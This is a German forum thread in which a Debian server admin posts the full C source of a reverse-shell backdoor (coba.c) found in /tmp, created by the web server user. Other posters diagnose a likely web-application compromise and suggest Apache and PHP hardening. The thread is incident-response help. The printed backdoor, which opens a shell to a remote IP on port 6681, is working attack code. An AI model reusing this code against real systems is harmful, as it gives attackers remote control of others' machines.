hi all,

auf einem unserer debian server (woody), fand ich heute im /tmp/ eine datei namens
coba.c
sie wurde vom www-data in der gruppe www-data angelegt.
habe alle pakete vom debian direkt installaiert -> also nichts selbst "gebaut".
der inhalt der datei sieht so aus:

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>

int fd, sock;
int port = 6681;
struct sockaddr_in addr;
char shell[] = "/bin/sh";
char mess[] = "\ndup!\n";
int main(int argc, char *argv[]) {
while(argc<2) {
fprintf(stderr, "\n %s <ipaddr>\n", argv[0]);
exit(0);
}

addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(argv[1]);
fd = socket(AF_INET, SOCK_STREAM, 0);
connect(fd, (struct sockaddr*) &addr, sizeof(addr));

send(fd, mess, sizeof(mess), 0);
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
execl(shell, "bash", 0);
close(fd);

return 1;
}


sie ist nicht ausführbar.
in meiner kernel.log fan dich zu diesem zeitpunkt folgenden eintrag:
TCP: Treason uncloaked! Peer 202.174.143.90:3343/80 shrinks window 2915742497:2915743227. Repaired.

1. hat das eine mit dem anderen etwas zu tun?
2. habe ich etwas zu befürchten?
es läuft wie gesagt apache darauf (von woody)
kernel ist auch 2.4.25 oben.
3. meine user sind alle auch die ftp user mit /bin/false "bestück" bis auf den www-data, sollte ich diesen eventuell ebenfalls mit /bin/false "bestücken" ?

danke

Sieht ganz danach aus dass er durch ist.

mhhh....

irgend wie glaube ich das allerdings nicht ganz.

1. keine md5sum änderungen der datein /bin/bash /bin/sh /etc/passwd /etc/shadow
2. nmap localhost und von extern - kein zusätzliches port
3. keine zombies - laut top ;-)
4. checksecurity sagt auch keinerlei änderungen
5. die datei wa rnicht ausführbar, aber dennoch existent.
6. aktueller chkrootkit sagt auch nichts - ich weiss das es "kacker" gibt die ihre eigenen rootkits bauen - aber gehe davon aus das der das nicht so ganz geshcafft hat, wenn er nicht mal die datei binär macht, sondern schön leselich

oder wo ist mein gedankenwirrgang bei den aufzählungen?

was ist wenn ich dem www-data user statt /bin/sh einfach /bin/false gebe? bringt das wieder ein schritt mehr sicherheit?

wie ist es eingltihc möglich das der "kacker" über den apache datein ins tmp ablegen kann? was kann man dagegen tun?

danke

Bug im Apache -> lokale user-Rechte von Apache
Apache darf Dateien in /tmp ablegen, also legt er dort sein c-file ab
das kompiliert er dann und führt es aus, was ihm zugang zu einer shell auf deinem rechner gibt
hättest du einen nicht so aktuellen Kernel drauf, hätte er sicherlich ein kernel-exploit dazu benutzt, um root-rechte zu erlangen

BUMM



Naja, bin bei der Arbeit und kann gerade nichts ausführliches schreiben, sorry für die Syntax...

mhhh,...
okay habe mal den bash vom www-data in der /etc/passwd auf /bin/fals geändert.

hoffe das reicht fürs erste.

danke

Original geschrieben von ccfritz
mhhh,...
okay habe mal den bash vom www-data in der /etc/passwd auf /bin/fals geändert.

hoffe das reicht fürs erste.


hilft nichts. die backdoor startet eine eigene shell, der eintrag in /etc/passwd interessiert da nicht.

mach lieber den apache dicht, das hilft mehr.


-j

naja, bin nach den debinahowto.de z.b. gegangen was das dichtmachen betrifft.
habe wie gesagt das orig. apache von woody, was ja unter staible läuft. hast du eine andere seite was das dicht machen betrifft auf lager bzw. tipps?

danke

hi,

wenn es nicht gerade streng geheim ist - wie heisst der rechner bzw. dessen ip ?
was läuft da drauf ? apache module, anwendungen etc.


mfg,
matze

Original geschrieben von ccfritz
naja, bin nach den debinahowto.de z.b. gegangen was das dichtmachen betrifft.
habe wie gesagt das orig. apache von woody, was ja unter staible läuft. hast du eine andere seite was das dicht machen betrifft auf lager bzw. tipps?


ich glaube nicht, dass der apache an sich das problem ist. eher php, cgi oder perl.

http://httpd.apache.org/docs/misc/security_tips.html

auf jeden fall alle module abschalten die man nicht benötigt. für die verbleibenden module alle optionen nacheinander anhand der doku durchgehen. dauert etwas aber dafür weiss man dann, was angeschaltet wurde und was nicht.


-j

oder eben auch fehler in der bzw. den anwendungen. eine gute anlaufstelle ist z.b. www.owasp.org

gruß,
matze

ja wie gesagt, alles orig. debian - woody.
also alles was unter stable laufen sollte:
php4
apache

halt mit den standart module:
config_log_module
mime_magic_module
mime_module
negotiation_module
status_module
autoindex_module
dir_module
cgi_module
userdir_module
alias_module
rewrite_module
access_module
auth_module
expires_module
headers_module
unique_id_module
setenvif_module
php4_module

ip: 80.78.228.50

wobei keinerlei perl scripte bei den 5usern liegen, alles php